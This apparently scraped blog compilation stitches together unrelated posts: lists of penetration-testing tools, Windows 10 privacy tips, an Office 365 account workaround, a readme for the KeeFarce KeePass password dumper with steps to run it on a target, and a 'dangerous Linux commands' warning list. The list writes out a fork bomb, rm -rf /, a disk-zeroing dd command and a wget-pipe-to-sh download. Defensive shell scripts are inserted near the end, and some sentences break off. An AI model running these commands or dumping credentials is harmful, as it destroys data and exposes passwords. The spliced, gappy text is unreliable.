What is Penetration Testing?

Pen tests can be automated with software applications or they can be performed manually. Either way, the process includes gathering information about the target before the test (reconnaissance), identifying possible entry points, attempting to break in (either virtually or for real) and reporting the findings.

The main objective of penetration testing is to determine security weaknesses. A pen test can also be used to test an organization’s security policy compliance, its employees’ security awareness and the organization’s ability to identify and respond to security incidents.

Penetration tests are sometimes called white hat attacks because in a pen test, the good guys are attempting to break in.

What’s Kali Linux?

Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools aimed at various information security tasks, such as Penetration Testing, Forensics and Reverse Engineering. Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.

Top 19 Penetration Testing Tools in Kali Linux 2.0


1. Metasploit

This is the most advanced and popular framework that can be used for pen-testing. It is based on the concept of an ‘exploit’, which is code that can get past the security measures and enter a certain system. Once in, it runs a ‘payload’, code that performs operations on the target machine, thus creating the perfect framework for penetration testing.

It can be used on web applications, networks, servers etc. It has a command-line and a GUI clickable interface, works on Linux, Apple Mac OS X and Microsoft Windows. This is a commercial product, although there might be free limited trials available.

2. Armitage

Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

Through one Metasploit instance, your team will:

  • Use the same sessions
  • Share hosts, captured data, and downloaded files
  • Communicate through a shared event log
  • Run bots to automate red team tasks

3. Wireshark

This is basically a network protocol analyzer, popular for providing the minutest details about your network protocols, packet information, decryption etc. It can be used on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many other systems. The information that is retrieved via this tool can be viewed through a GUI, or the TTY-mode TShark utility.


4. Burpsuite

Burp Suite is also essentially a scanner (with a limited “intruder” tool for attacks), although many security testing specialists swear that pen-testing without this tool is unimaginable. The tool is not free, but very cost effective. Take a look at it on the download page below. It mainly works wonders with intercepting proxy, crawling content and functionality, web application scanning etc. You can use this on Windows, Mac OS X and Linux environments.


5. Acunetix

Acunetix is essentially a web vulnerability scanner targeted at web applications. It provides SQL injection, cross site scripting testing, PCI compliance reports etc. along with identifying a multitude of vulnerabilities. This is among the more ‘pricey’ tools.


6. John The Ripper

Another password cracker in line is John the Ripper. This tool works in most environments, although it’s primarily for UNIX systems. It is considered one of the fastest tools in this genre. Password hash code and strength-checking code are also made available to be integrated into your own software/code, which I think is very unique. This tool comes in a pro and free form.


7. Social Engineer Toolkit

The Social-Engineer Toolkit (SET) is a unique tool in that its attacks are targeted at the human element rather than at the system element. It has features that let you send emails, Java applets, etc. containing the attack code. It goes without saying that this tool is to be used very carefully and only for ‘white-hat’ reasons. It has a command-line interface and works on Linux, Apple Mac OS X and Microsoft Windows.

8. Nmap

“Network Mapper”, though not necessarily a pen-testing tool, is a must-have for ethical hackers. This is a very popular tool that predominantly aids in understanding the characteristics of any target network. The characteristics can include hosts, services, OS, packet filters/firewalls etc. It works in most environments and is open source.


9. BeEF

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser: it takes advantage of the fact that an open web browser is the window (or crack) into a target system and designs its attacks to go on from this point. It has a GUI interface and works on Linux, Apple Mac OS X and Microsoft Windows.


10. Aircrack-ng

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the PTW attack, thus making the attack much faster compared to other WEP cracking tools.

In fact, Aircrack-ng is a set of tools for auditing wireless networks.

11. Sqlmap

Sqlmap is again a good open source pen testing tool. This tool is mainly used for detecting and exploiting SQL injection issues in an application and taking over database servers. It comes with a command-line interface. Supported platforms: Linux, Apple Mac OS X and Microsoft Windows.

12. Ettercap

Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. It can be used for computer network protocol analysis and security auditing. It runs on various Unix-like operating systems including Linux, Mac OS X, BSD and Solaris, and on Microsoft Windows.

13. Hydra

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

It supports: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

14. Maltego

Maltego is a program built into Kali Linux that lets you do reconnaissance on any person, by scraping up data from all publicly available areas of the Internet. Maltego is used for information gathering and data-mining, and can be useful for anyone who needs to gather data on a person or company.


15. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers.


16. Sqlninja

Sqlninja, as the name indicates, is all about taking over the DB server using SQL injection in any environment. The product itself claims to be not so stable, but its popularity indicates how robust it already is at exploiting DB-related vulnerabilities. It has a command-line interface and works on Linux and Apple Mac OS X, but not on Microsoft Windows.


17. CORE Impact

CORE Impact Pro can be used to test mobile device penetration, network/network device penetration, password identification and cracking, etc. It has a command-line and a GUI clickable interface and works on Microsoft Windows. This is one of the expensive tools in this line.

18. Canvas

Immunity’s CANVAS is a widely used tool that contains more than 400 exploits and multiple payload options. It renders itself useful for web applications, wireless systems, networks etc. It has a command-line and GUI interface and works on Linux, Apple Mac OS X and Microsoft Windows. It is not free of charge, and more information can be found at the page below.

19. Retina

As opposed to a certain application or a server, Retina targets the entire environment at a particular company/firm. It comes as a package called Retina Community. It is a commercial product and is more of a vulnerability management tool than a pen-testing tool. It works on having scheduled assessments and presenting results. Check out more about this package at the page below.


If you have installed Windows 10 and agreed to its terms and conditions during installation, then you are being spied on, and this is not a conspiracy theory but a fact.

Here’s what’s going on and how you can prevent yourself from being spied on.

Microsoft’s new service agreement consists of about 12,000 words and clearly states that the operating system will be invading your privacy like never before. If you haven’t read it, that’s not your mistake; we hardly read TOS (Terms Of Service) anyway.

So Microsoft’s new service agreement states that,


Microsoft does, however, also give you an option to opt out of features that you think may be invading your privacy, but remember that if you have installed Windows 10 you have opted in to all features by default.


If you are reading this section because you are seriously worried about this, understand that opting out of Windows 10 is not so straightforward. However, if you follow each of the mentioned steps thoroughly then you will be able to prevent yourself from Windows 10 spying in no time.

NOTE: These steps apply in both cases: whether you are about to install Windows 10 on your computer, or have already installed it without paying extra attention to the installation instructions. Depending on your situation, you might need to perform all of the following.

Here are 4 simple tasks you have to follow to stop Windows 10 from spying on you:

Task # 1: Go to ‘Settings’ -> ‘Privacy’. From there you will have to go through 13 different selection screens, turning everything of concern to you to ‘off’. You will find some of the most important settings under the ‘General’ section, whereas the other setup screens will let you select whether you want specific Windows apps to access your messages, camera, calendar and other areas.

Task # 2: You might also want to change Cortana’s settings, turning every option to ‘off’. But your selections completely depend on whether you find this feature useful or not.

Task # 3: This one is an essential option that you have to turn off. And many are going to miss this one because these settings are only changeable through an external website. So head over to, there you will find two selections i.e. “Personalized ads in this browser” and “Personalised ads wherever I use my Microsoft account”. Turn both of them to ‘off’.


Task # 4: To add another layer of privacy, you might also be interested in removing your Microsoft account from Windows 10, and use some local account instead. Doing this might take away some of the features like Synchronisation across other devices, OneDrive and Windows Store – won’t be a big deal for many! So to remove your Microsoft account, head over to ‘Settings’ -> ‘Accounts’ -> ‘Your Account within Windows 10’, and from there you will be able to remove the account.

Windows 10 will sync data and settings by default with its servers. That includes browser history, currently open web pages, favorites pages, websites, saved apps, Wi-Fi network names and passwords and mobile hotspot passwords.

We also advise you not to activate Cortana, Microsoft’s personal virtual assistant, but if you have already activated it here’s what you’ve allowed it to collect:

  • Your device location
  • Your email and text messages data
  • Your Calendar data
  • Apps you are using
  • Your contact list
  • Who’s calling you
  • Who you are in touch with more often
  • Your alarm settings
  • Your music on device
  • What you purchase
  • Your search history in case you’re using Bing search engine.


That is not all:


Windows 10 can also use you for marketing and advertising purposes as it generates a unique advertising ID for users on every device which can be further used to serve commercial content.

Windows 10 comes with a default capability of automatically detecting malware on the user’s PC, but when it’s collecting personal data at such a level, you don’t need malware.

So Windows 10 is spying on you; do opt out of all such features you think are a privacy invasion for you.


There is one key administrative feature that seems to be missing from Microsoft Office 365 – the “kill switch” that disables an Office 365 account and kills all active sessions (browser, ActiveSync, etc.).  Without official guidance from Microsoft, there has been speculation from Office 365 Admins on the best approach for disabling access to an Office 365 account in the event of a breach or security issue.

  • Change the password on the mailbox
  • Remove the mailbox using the “Remove-Mailbox” command
    • For example:
Remove-Mailbox -Identity "John Rodman"
  • Wait 15 minutes
  • Restore the mailbox

Restoring the mailbox is an important step in this process, since the mailbox will be automatically deleted if you do not restore it within 30 days.

KeeFarce allows for the extraction of KeePass 2.x password database information from memory. The cleartext information, including usernames, passwords, notes and URLs, is dumped into a CSV file in %AppData%.

General Design

KeeFarce uses DLL injection to execute code within the context of a running KeePass process. C# code execution is achieved by first injecting an architecture-appropriate bootstrap DLL. This spawns an instance of the dot net runtime within the appropriate app domain, subsequently executing KeeFarceDLL.dll (the main C# payload).

The KeeFarceDLL uses CLRMD to find the necessary object in the KeePass process’s heap, locates the pointers to some required sub-objects (using offsets), and uses reflection to call an export method.

Prebuilt Packages

An appropriate build of KeeFarce needs to be used depending on the KeePass target’s architecture (32 bit or 64 bit). Archives and their shasums can be found under the ‘prebuilt’ directory.


In order to execute on the target host, the following files need to be in the same folder:

  • BootstrapDLL.dll
  • KeeFarce.exe
  • KeeFarceDLL.dll
  • Microsoft.Diagnostic.Runtime.dll

Copy these files across to the target and execute KeeFarce.exe


Open up the KeeFarce.sln with Visual Studio (note: dev was done on Visual Studio 2015) and hit ‘build’. The results will be spat out into dist/$architecture. You’ll have to copy the KeeFarceDLL.dll files and Microsoft.Diagnostic.Runtime.dll files into the folder before executing, as these are architecture independent.


KeeFarce has been tested on:
KeePass 2.28, 2.29 and 2.30 – running on Windows 8.1 – both 32 and 64 bit.
This should also work on older Windows machines (Win 7 with a recent service pack). If you’re targeting something other than the above, then testing in a lab environment beforehand is recommended.


Searching for where to learn how to code for free? Then stop. You are in the perfect place: here we list the top 50 websites that will help you learn how to code. The websites listed below will help you find a good coding platform for beginners. From here you will learn HTML, CSS, Javascript, SQL, XHTML, Bootstrap, C, C++, Python, Ruby, Android Development, Java and lots more. So check out each of these websites and start learning how to code.



The most heard name in learning how to code. Codecademy is the place to go if you aren’t quite sure where to start. The main plus point of Codecademy is that it has an advanced interface to type code and render it without using an external notepad or browser. Codecademy works on a reward system and rewards you with badges for your achievements. Codecademy will help you learn HTML & CSS, JavaScript, jQuery, PHP, Python, SQL, Ruby, Rails and AngularJS.


Udacity is the next best on the web to learn to code. Udacity offers video tutorials with quizzes inserted at intervals. The video tutorials offered at Udacity are broken down into segments of 2-3 minutes that simply do what they were meant to. Udacity also offers a final test on your course and provides you with a downloadable certificate as shown below, for your achievement. Udacity will help you learn Computer Science, Web Application Engineering, Software Testing, Web Development, HTML5, Python, Java, Computer Science, Algorithm.

3. Google Android Development

If you would like to learn Android development, then this is the best place. Learn it from the creators. Google offers advanced Android development tutorials for its users. They will teach you everything from how to make an app to how to submit it to the Play Store.

4. Google’s Python Class

Google’s Python Class is a free class for people with a little bit of programming experience who want to learn Python. The class includes written materials, lecture videos, and lots of code exercises to practice Python coding. These materials are used within Google to introduce Python to people who have just a little programming experience.


Coursera offers a wide range of courses in Computer science alone, and you cannot start off instantly. Although it is free, the classes are conducted once every few months and you have to enrol in advance, or add the class to your wishlist for the next session. Coursera will guide you to learn Computer architecture, Programming languages, C++ for C programming, Algorithms, Artificial Intelligence, Cryptography, etc.

Courses offered by are basic concepts of Computer Science with drag and drop programming, basics of JavaScript programming , Python, Hopscotch etc


W3Schools is optimized for learning, testing, and training. They will guide you to learn HTML, CSS, Javascript, jQuery, Bootstrap.


The New Boston offers an incredible collection of video tutorials for all types of programming, including iPhone and computer game development. Thenewboston provides video tutorials for HTML5, CSS, Javascript, Java, Python, PHP, App Development, Android Development, C Programming.

9. MIT OpenCourseWare

Find more than a hundred online course materials for electrical engineering and computer science in MIT’s OpenCourseWare collection.

10. Khan Academy

One of the original free online coding resources, Khan Academy has come a long way. With easy-to-follow course sections with step-by-step video tutorials, Khan Academy is a great place to get started with your coding career. It does not offer a set of programming languages, but it deals with programming basics and an approach to coding that could be applied to a vast array of languages.


On Webmonkey, you’ll find tutorials for everything from building your first website to developing with HTML5. The tutorial section includes HTML5, Ajax, CSS, APIs, Javascript etc.


Codeavengers will teach you how to develop your own games, websites and apps. Tutorials include HTML, CSS, Javascript, Python etc.

So as not to bore you, here is the quick list of the remaining 38 websites:

Websites What You Will Learn
13. Codeschool HTML/CSS, JavaScript, Ruby, iOS
14. TeamTreeHouse HTML/CSS, JavaScript, Ruby, iOS, Android, Python…
15. Html5Rocks HTML5/CSS
16. Sqlzoo SQL
17. EDX Computer Science, Java
18. TheCodePlayer HTML5, CSS3, Javascript, Jquery
19. LearnPythonTheHardWay Python
20. SkillCrush HTML/CSS, Javascript, Python …more
21. TutsPlus WordPress Plugin Development, Webdesigning, Other Coding tutorials
22. CodeCombat Play to learn code
23. DontFearTheInternet HTML/CSS
24. LearnLayout Advanced CSS
25. Atozcss CSS Screencasts
26. Dash HTML5, CSS3, Javascript
27. Web Accessibility Tools and techniques for web developers
28. TheHelloWorldProgram Web Development, Linux, Python
29. PythonTutor Python
30. CodeLearn Web Development
31. Rubymonk Ruby
32. Stanford University Software Algorithms
33. NodeTuts Node JS video tutorials
34. NodeSchool Web software skills
35. Egghead Video training for AngularJS, React, D3, and many other essential modern web technologies
36. Learn-Angular AngularJS
37. IOS Development IOS
38. LearnJavaOnline Java
39. CodingBat Java, Python
40. Techotopia IOS, Android
41. EssentialSQL SQL
42. SqlBolt SQL
43. Coderdojo HTML5, CSS3, Javascript
44. HackDesign Design course
45. Mozilla Developer Network Mozilla Development
46. Programming Video Tutorials C++
47. National Programme on Technology Enhanced Learning Principles of Programming Languages
48. Landofcode Java, CSS, HTML, PHP and VBScript
49. SitePoint Reference HTML5, CSS3, Javascript
50. Wikiversity PHP, C++, Python, Java… etc


Most penetration testers use either a Mac or a Linux-based platform to perform their penetration testing activities. However, it is always good practice to also have a Windows virtual machine with some tools ready to be used for the engagement. The reason for this is that, although Windows cannot be used as a main platform for penetration testing, some of its utilities and tools can still help us to extract information from our Windows targets. So in this post we will see some of the tools that we can use on our Windows system.

HashCheck Shell Extension

The HashCheck Shell Extension makes it easy for anyone to calculate and verify checksums and hashes from Windows Explorer. In addition to integrating file checksumming functionality into Windows, HashCheck can also create and verify SFV files (and other forms of checksum files, such as .md5 files).


Netcat is often referred to as a “Swiss-army knife for TCP/IP”. Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.

Metasploit Framework

The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

RealVNC Viewer

Remote access software for desktop and mobile platforms.


SNMP tool that allows you to collect information about SNMP devices.

Cain & Abel

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.


Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development.


PuTTY is an SSH and telnet client for the Windows platform.

Pass The Hash Toolkit

The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions maintained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with their corresponding NTLM credentials (e.g. users remotely logged in through Remote Desktop/Terminal Services), and also change at runtime the current username, domain name, and NTLM hashes.


Recovering Windows Password Cache Entries.


Identify unknown open ports and their associated applications.


This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares.

Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.


Winfo uses null sessions to remotely try to retrieve lists of and information about user accounts, workstation/interdomain/server trust accounts, shares (also hidden), sessions, logged in users, and password/lockout policy, from Windows NT/2000/XP. It also identifies the built-in Administrator and Guest accounts, even if their names have been changed.


ClearLogs clears the event log (Security, System or Application) that you specify. You run it from the Command Prompt, and it can also clear logs on a remote computer.


SQLdict is a dictionary attack tool for SQL Server.


PMDump is a tool that lets you dump the memory contents of a process to a file without stopping the process.


GrabItAll performs traffic redirection by sending spoofed ARP replies. It can redirect traffic from one computer to the attacker’s computer, or redirect traffic between two other computers through the attacker’s computer. In the last case you need to enable IP Forwarding, which can be done with GrabItAll too.


DumpUsers is able to dump account names and information even though RestrictAnonymous has been set to 1.


BrowseList retrieves the browse list. The output list contains computer names, and the roles they play in the network. For example you can see which are PDC, BDC, stand-alone servers and workstations. You can also see the system comments (which can be very interesting reading).


Remoxec executes a program using RPC (Task Scheduler) or DCOM (Windows Management Instrumentation).


Brute-force tool for Windows Management Instrumentation (WMI).


Venom is a tool to run dictionary password attacks against Windows accounts by using the Windows Management Instrumentation (WMI) service. This can be useful in those cases where the server service has been disabled.


The SMB Auditing Tool is a password auditing tool for the Windows and SMB platforms. It makes it possible to exploit the timeout architecture bug in Windows 2000/XP, making it extremely fast to guess passwords on these platforms.


RPCScan v2.03 is a Windows based detection and analysis utility that can quickly and accurately identify Microsoft operating systems that are vulnerable to the multiple buffer overflow vulnerabilities released in the MS03-026 and MS03-039 bulletins.


LSASecretsDump is a small console application that extracts the LSA secrets from the Registry, decrypts them, and dumps them into the console window.


SQL Ping is a nice little command line enumerator that specifically looks for SQL servers and requires no authentication whatsoever.


The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle database servers.


Extract password hashes from local user accounts.


The PsTools package provides a set of command line utilities that allow you to manage local and remote systems.


Incognito is a tool for manipulating windows access tokens and is intended for use by penetration testers, security consultants and system administrators.


DumpSec is a security auditing program for Microsoft Windows® NT/XP/200x. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, registry, printers and shares in a concise, readable format, so that holes in system security are readily apparent. DumpSec also dumps user, group and replication information.


X-Deep/32 is an X Window Server for Windows NT/2000/9X/ME/XP that can be used to connect to host systems running UNIX, LINUX, IBM AIX etc.


Windows password cracker.


Ophcrack is a free Windows password cracker based on rainbow tables.


SiVus is the first publicly available vulnerability scanner for VoIP networks that use the SIP protocol. It provides powerful features to assess the security and robustness of VoIP implementations.

Linux shell or terminal commands are very powerful, and a single simple command can delete a folder, files, the root folder, etc. Linux does not ask for confirmation; it executes the command right away, causing you to lose useful data and information stored in these files and folders.

Take a look at the 9 commands and codes you should avoid executing.

1. Linux Fork Bomb Command

:(){ :|: & };:, also known as a Fork Bomb, is a denial-of-service attack against a Linux system. :(){ :|: & };: is a bash function. Once executed, it repeats itself multiple times until the system freezes.

To get rid of this you need to restart or reboot your server. So be careful when executing this command on your Linux shell.

2. Mv Folder /Dev/Null Command

mv folder /dev/null is another risky command. /dev/null, or the null device, is a device file that discards all the data written to it but reports that the write operation was executed successfully. It is also known as the bit bucket or black hole.

3. Rm -Rf Command

The rm -rf command is used to delete a folder and its content in the Linux operating system. If you don’t know how to use it then it’s very dangerous to the system. The most common combinations and options used with the rm -rf command are listed below:

  • rm command is used to delete the files in Linux system.
  • rm -f command removes read-only files in folder without prompting.
  • rm -r command deletes the content of a folder recursively.
  • rm -d command is used to remove an empty directory but it will refuse to remove directory if it is not empty.
  • rm -rf / command is used for forced deletion (it deletes it even if it’s write protected) of all the content in root directory and sub folders.
  • rm -rf * command is used for forced deletion of all the content in the current directory (directory you are currently working in) and sub folders.
  • rm -rf . command is used for forced deletion of all the content in the current folder and sub folders. The rm -r .[^.]* command can also be used.
  • rm -i command is used for removal of files and folders but a prompt will appear before removal.

4. Mkfs Command

mkfs can be a dangerous command for your Linux based system if you don’t know its purpose. Anything written after the mkfs will be formatted and replaced by a blank Linux file system.

The commands given below will format the hard drive and require administrative privileges:

  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos
  • mkfs.reiserfs
  • mkfs.vfat
  • mkfs.cramfs (no administrative privileges needed)

5. Tar Bomb

The tar command is used to combine many files into a single file (archive file) in .tar format. A Tape Archive (tar) bomb can be created with this command.

It is an archive file which explodes into thousands or millions of files with names similar to the existing files into the current directory rather than into a new directory when untarred.

To avoid becoming a victim of a tar bomb, regularly create a new protective directory whenever you receive a tar file and move the received tar file into this directory before untarring. If the tar file is indeed a tar bomb then you can simply remove the newly created directory to get rid of it.

Another way to avoid the explosion of a tar bomb is via the -t option to list all of the content of a tar file to give you an idea of the type of content contained within the tar file.
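The two precautions above (list with -t first, extract into a fresh directory) can be combined in a small POSIX shell script. This is an added example, not part of the original article; the function names and the sample archives are this example's own, and it goes slightly further than the text by also refusing archives whose member names are absolute or contain "..".

```shell
#!/bin/sh
# Added example (not from the original article). POSIX sh; function names
# are this example's own.

# classify_listing: read member names (the output of `tar -tf`) on stdin and
# print one verdict:
#   unsafe  a name is absolute or has a ".." component (can leave the target)
#   bomb    names are spread over more than one top-level entry
#   ok      everything sits under a single top-level entry
#   empty   no names at all
classify_listing() {
    names=$(cat)
    if [ -z "$names" ]; then echo empty; return 0; fi
    if printf '%s\n' "$names" | grep -Eq '^/|(^|/)\.\.(/|$)'; then
        echo unsafe; return 0
    fi
    # Reduce each name to its first path component (ignoring a leading "./")
    # and count the distinct ones.
    tops=$(printf '%s\n' "$names" |
        sed -e 's|^\./||' -e 's|/.*||' -e '/^$/d' -e '/^\.$/d' |
        sort -u | wc -l | tr -d ' ')
    if [ "$tops" -gt 1 ]; then echo bomb; else echo ok; fi
}

# safe_untar ARCHIVE [PARENT]: list first, refuse "unsafe" or empty archives,
# otherwise extract into a brand-new directory under PARENT and print its path.
# A tar bomb then lands inside that directory and one `rm -r` undoes it.
safe_untar() {
    su_archive=$1
    su_parent=${2:-.}
    su_list=$(tar -tf "$su_archive" 2>/dev/null) || {
        echo "cannot list $su_archive" >&2; return 2; }
    su_verdict=$(printf '%s\n' "$su_list" | classify_listing)
    case $su_verdict in
        unsafe|empty)
            echo "refusing $su_archive: $su_verdict" >&2; return 1 ;;
    esac
    su_dest=$(mktemp -d "$su_parent/untar.XXXXXX") || return 2
    tar -xf "$su_archive" -C "$su_dest" || return 2
    if [ "$su_verdict" = bomb ]; then
        echo "note: $su_archive has no single top-level directory" >&2
    fi
    echo "$su_dest"
}

# make_sample_archives DIR: build two constructed archives for trying this
# out: DIR/good.tar (one top-level directory) and DIR/bomb.tar (loose files).
make_sample_archives() {
    ms_dir=$1
    mkdir -p "$ms_dir/src/proj" || return 1
    for ms_i in 1 2 3; do
        echo "file $ms_i" > "$ms_dir/src/proj/f$ms_i.txt"
    done
    tar -cf "$ms_dir/good.tar" -C "$ms_dir/src" proj &&
    tar -cf "$ms_dir/bomb.tar" -C "$ms_dir/src/proj" f1.txt f2.txt f3.txt
}

# Command-line use: sh safe_untar.sh ARCHIVE [PARENT_DIR]
if [ "$#" -ge 1 ]; then
    safe_untar "$@"
fi
```

The listing check only reads the archive's index, so it is cheap to run on every received tar file before extraction.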

6. Dd Command

The dd command is used to copy & convert hard disk partitions. However, it can turn out to be harmful if you specify the wrong destination.

The command may be any one of these:

  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda
  • dd if=/dev/zero of=/dev/hda (will zero out the whole primary hard drive)

7. Shell Script Code

Someone may victimize you by giving you a link to a shell script and encouraging you to download and execute it. The script may contain some malicious or dangerous code inside. The command may look like this: wget http://some_malicious_source -O- | sh. wget downloads the script while sh executes it.

8. Malicious Source Code

Someone gives you the source code and asks you to compile it. The code may appear to be a normal code but in fact some malicious code is disguised in the large source code and it may cause harm to your system. To avoid being victimized by this kind of attack, only accept and compile your source code from trustworthy sources.

9. Decompression Bomb

You have received a compressed file and are asked to extract it. The file appears to be very small, maybe a few KB, but in fact this small compressed file contains very highly compressed data.

Once the file is decompressed, hundreds of GB of data is extracted which can fill up your hard drive to bring down the performance of your system.
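One way to open an untrusted gzip file without letting it fill the disk is to decompress through a pipe with a hard byte cap. This is an added example, not part of the original article; the function names, the limits and the sample files it builds are this example's own.

```shell
#!/bin/sh
# Added example (not from the original article). POSIX sh plus `head -c`;
# function names are this example's own.

# guarded_gunzip IN OUT LIMIT
# Decompress gzip file IN to OUT, but never write more than LIMIT+1 bytes.
#   returns 0 and prints the expanded size if it fits within LIMIT bytes
#   returns 1 (OUT removed) if the data expands past LIMIT
#   returns 2 (OUT removed) if IN is not valid gzip or is truncated
guarded_gunzip() {
    gg_in=$1; gg_out=$2; gg_limit=$3
    gg_state="$gg_out.state"
    echo incomplete > "$gg_state"
    # head stops reading after LIMIT+1 bytes; gzip is then stopped by the
    # closed pipe, so a bomb costs at most LIMIT+1 bytes of disk.
    { gzip -dc "$gg_in" 2>/dev/null && echo complete > "$gg_state"; } |
        head -c "$((gg_limit + 1))" > "$gg_out"
    gg_n=$(wc -c < "$gg_out" | tr -d ' ')
    gg_result=$(cat "$gg_state")
    rm -f "$gg_state"
    if [ "$gg_n" -gt "$gg_limit" ]; then
        rm -f "$gg_out"
        echo "refused: $gg_in expands past $gg_limit bytes" >&2
        return 1
    fi
    if [ "$gg_result" != complete ]; then
        rm -f "$gg_out"
        echo "refused: $gg_in is not a complete gzip stream" >&2
        return 2
    fi
    echo "$gg_n"
}

# make_sample_gz DIR: constructed inputs for trying this out.
#   zeros.gz  5,000,000 zero bytes, only a few KB when compressed
#   small.gz  the six bytes "hello\n"
#   junk.gz   plain text with a .gz name
make_sample_gz() {
    head -c 5000000 /dev/zero | gzip -c > "$1/zeros.gz" &&
    printf 'hello\n' | gzip -c > "$1/small.gz" &&
    printf 'this is not gzip data\n' > "$1/junk.gz"
}

# Command-line use: sh guarded_gunzip.sh IN OUT LIMIT_BYTES
if [ "$#" -eq 3 ]; then
    guarded_gunzip "$@"
fi
```

Pick the limit from what the file is supposed to contain rather than from free disk space, so an oversized expansion is refused long before the drive fills up.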